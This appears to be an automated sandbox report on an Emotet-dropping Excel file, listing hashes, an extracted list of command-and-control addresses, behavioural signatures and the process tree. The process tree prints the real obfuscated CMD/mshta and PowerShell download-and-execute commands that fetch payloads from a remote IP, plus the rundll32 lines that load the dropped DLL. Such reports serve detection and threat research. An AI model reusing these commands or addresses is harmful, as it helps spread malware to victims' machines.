Analysis
- max time kernel: 60s
- max time network: 50s
- platform: windows10_x64
- resource: win10-en-20211208
- submitted: 28-01-2022 01:01
-
Behavioral task: behavioral1
- Sample: 2022-1-28-a1465b9e27030fa71b863fcbbe264405.xls
- Resource: win7-en-20211208
General
- Target: 2022-1-28-a1465b9e27030fa71b863fcbbe264405.xls
- Size: 46KB
- MD5: a1465b9e27030fa71b863fcbbe264405
- SHA1: 072615acb803b2f602222ba683b72ece4b1c5fec
- SHA256: 0aeb1fed2a92309d35b4c1ee2f5a18ad9594fd5382f4ab9fe6fa431e9a426548
- SHA512: 697e729b34013c3fc8956e9c8bb9e5799df007666f4bf288a878f35d3a4be597d51f71616096b2b363fa3a397a8a2662d1231403acedbdcfa88a2a0032c1edc6
Malware Config
- Extracted: http://91.240.118.168/vvv/ppp/fe.html
- Extracted: http://91.240.118.168/vvv/ppp/fe.png
- Extracted: emotet (Epoch4), C2 list:
51.15.4.22:443
173.214.173.220:8080
212.237.5.209:443
192.254.71.210:443
216.158.226.206:443
162.243.175.63:443
212.24.98.99:8080
58.227.42.236:80
45.118.115.99:8080
104.251.214.46:8080
185.157.82.209:8080
46.55.222.11:443
188.40.137.206:8080
81.0.236.90:443
103.75.201.2:443
129.232.188.93:443
195.154.133.20:443
159.8.59.82:8080
79.172.212.216:8080
138.185.72.26:8080
200.17.134.35:7080
185.157.82.211:8080
209.59.138.75:7080
178.63.25.185:443
45.176.232.124:443
45.118.135.203:7080
164.68.99.3:8080
203.114.109.124:443
212.237.17.99:8080
50.116.54.215:443
131.100.24.231:80
212.237.56.116:7080
45.142.114.231:8080
162.214.50.39:7080
51.38.71.0:443
104.168.155.129:8080
107.182.225.142:8080
217.182.143.207:443
158.69.222.101:443
176.104.106.96:8080
207.38.84.195:8080
41.76.108.46:8080
110.232.117.186:8080
178.79.147.66:8080
173.212.193.249:8080
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
  description | pid | pid_target | process | target process
  Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 2072 | 3972 | CMD.EXE | EXCEL.EXE
-
Blocklisted process makes network request 3 IoCs
Processes:
  flow | pid | process
  41 | 3924 | mshta.exe
  43 | 2376 | powershell.exe
  45 | 2376 | powershell.exe
-
Downloads MZ/PE file
-
Loads dropped DLL 2 IoCs
Processes:
  pid | process
  1896 | rundll32.exe
  3876 | rundll32.exe
-
Drops file in System32 directory 1 IoCs
Processes:
  description | ioc | process
  File opened for modification | C:\Windows\SysWOW64\Lyupkftsqjvs\ggwxblau.exv | rundll32.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
  pid | pid_target | process | target process
  988 | 3924 | WerFault.exe | mshta.exe
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | EXCEL.EXE
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
  description | ioc | process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | EXCEL.EXE
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | EXCEL.EXE
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
  pid | process
  3972 | EXCEL.EXE
-
Suspicious behavior: EnumeratesProcesses 19 IoCs
Processes:
  pid | process
  2376 | powershell.exe (3 entries)
  988 | WerFault.exe (14 entries)
  1048 | rundll32.exe (2 entries)
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
  description | pid | process
  Token: SeDebugPrivilege | 2376 | powershell.exe
  Token: SeDebugPrivilege | 988 | WerFault.exe
-
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
  pid | process
  3972 | EXCEL.EXE (12 entries)
-
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
  description | pid | process | target process
  PID 3972 wrote to memory of 2072 | 3972 | EXCEL.EXE | CMD.EXE (2 entries)
  PID 2072 wrote to memory of 3924 | 2072 | CMD.EXE | mshta.exe (2 entries)
  PID 3924 wrote to memory of 2376 | 3924 | mshta.exe | powershell.exe (2 entries)
  PID 2376 wrote to memory of 1400 | 2376 | powershell.exe | cmd.exe (2 entries)
  PID 1400 wrote to memory of 1896 | 1400 | cmd.exe | rundll32.exe (3 entries)
  PID 1896 wrote to memory of 3876 | 1896 | rundll32.exe | rundll32.exe (3 entries)
  PID 3876 wrote to memory of 740 | 3876 | rundll32.exe | rundll32.exe (3 entries)
  PID 740 wrote to memory of 1048 | 740 | rundll32.exe | rundll32.exe (3 entries)
Processes
-
[level 1] C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\2022-1-28-a1465b9e27030fa71b863fcbbe264405.xls"
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
-
[level 2] C:\Windows\SYSTEM32\CMD.EXE
  Command line: CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
-
[level 3] C:\Windows\system32\mshta.exe
  Command line: mshta http://91.240.118.168/vvv/ppp/fe.html
  - Blocklisted process makes network request
  - Suspicious use of WriteProcessMemory
-
[level 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
-
[level 5] C:\Windows\system32\cmd.exe
  Command line: "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD
  - Suspicious use of WriteProcessMemory
-
[level 6] C:\Windows\SysWow64\rundll32.exe
  Command line: C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
-
[level 7] C:\Windows\SysWOW64\rundll32.exe
  Command line: C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
  - Loads dropped DLL
  - Drops file in System32 directory
  - Suspicious use of WriteProcessMemory
-
[level 8] C:\Windows\SysWOW64\rundll32.exe
  Command line: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Lyupkftsqjvs\ggwxblau.exv",pWDVOZaNX
  - Suspicious use of WriteProcessMemory
-
[level 9] C:\Windows\SysWOW64\rundll32.exe
  Command line: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Lyupkftsqjvs\ggwxblau.exv",DllRegisterServer
  - Suspicious behavior: EnumeratesProcesses
-
[level 4] C:\Windows\system32\WerFault.exe
  Command line: C:\Windows\system32\WerFault.exe -u -p 3924 -s 2276
  - Program crash
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\ProgramData\QWER.dll
  MD5: 06626264eaac835fedf9da1123f8d390
  SHA1: a6ab8e057c18a48ee50c6ad7ae010d3b09e0c094
  SHA256: 297842eba5121f4492061ace94399b77c18763e46cd3f70dee9e12fa9c0e213d
  SHA512: 4af800b6497e58547bb1a2155f5b8ee5102c80265b1d43c19469e1470d5d57c6a302d13830b09ac0bae359f1bfab4dce9832e987982117c6feee61c9eaca0b33
-
\ProgramData\QWER.dll
  MD5: 06626264eaac835fedf9da1123f8d390
  SHA1: a6ab8e057c18a48ee50c6ad7ae010d3b09e0c094
  SHA256: 297842eba5121f4492061ace94399b77c18763e46cd3f70dee9e12fa9c0e213d
  SHA512: 4af800b6497e58547bb1a2155f5b8ee5102c80265b1d43c19469e1470d5d57c6a302d13830b09ac0bae359f1bfab4dce9832e987982117c6feee61c9eaca0b33
-
memory/740-616-0x0000000002FD0000-0x0000000002FF5000-memory.dmp  Filesize: 148KB
memory/1048-620-0x00000000000A0000-0x00000000000C5000-memory.dmp  Filesize: 148KB
memory/1048-622-0x00000000002C0000-0x00000000002E5000-memory.dmp  Filesize: 148KB
memory/1896-599-0x0000000000BD0000-0x0000000000BF5000-memory.dmp  Filesize: 148KB
memory/2376-279-0x000002ABF0C70000-0x000002ABF0C92000-memory.dmp  Filesize: 136KB
memory/2376-289-0x000002ABF0CD3000-0x000002ABF0CD5000-memory.dmp  Filesize: 8KB
memory/2376-288-0x000002ABF0CD0000-0x000002ABF0CD2000-memory.dmp  Filesize: 8KB
memory/2376-300-0x000002ABF1600000-0x000002ABF163C000-memory.dmp  Filesize: 240KB
memory/2376-311-0x000002ABF16C0000-0x000002ABF1736000-memory.dmp  Filesize: 472KB
memory/2376-545-0x000002ABF0CD6000-0x000002ABF0CD8000-memory.dmp  Filesize: 8KB
memory/3876-606-0x0000000004C80000-0x0000000004CA5000-memory.dmp  Filesize: 148KB
memory/3876-611-0x0000000004E40000-0x0000000004E65000-memory.dmp  Filesize: 148KB
memory/3876-619-0x0000000005090000-0x00000000050B5000-memory.dmp  Filesize: 148KB
memory/3876-615-0x0000000004F00000-0x0000000004F25000-memory.dmp  Filesize: 148KB
memory/3876-603-0x0000000004780000-0x00000000047A5000-memory.dmp  Filesize: 148KB
memory/3876-613-0x0000000004EA0000-0x0000000004EC5000-memory.dmp  Filesize: 148KB
memory/3876-609-0x0000000004D60000-0x0000000004D85000-memory.dmp  Filesize: 148KB
memory/3972-129-0x00007FFE8D940000-0x00007FFE8D950000-memory.dmp  Filesize: 64KB
memory/3972-115-0x00007FFE91410000-0x00007FFE91420000-memory.dmp  Filesize: 64KB
memory/3972-119-0x00007FFE91410000-0x00007FFE91420000-memory.dmp  Filesize: 64KB
memory/3972-118-0x00007FFE91410000-0x00007FFE91420000-memory.dmp  Filesize: 64KB
memory/3972-128-0x00007FFE8D940000-0x00007FFE8D950000-memory.dmp  Filesize: 64KB
memory/3972-117-0x00007FFE91410000-0x00007FFE91420000-memory.dmp  Filesize: 64KB
memory/3972-116-0x00007FFE91410000-0x00007FFE91420000-memory.dmp  Filesize: 64KB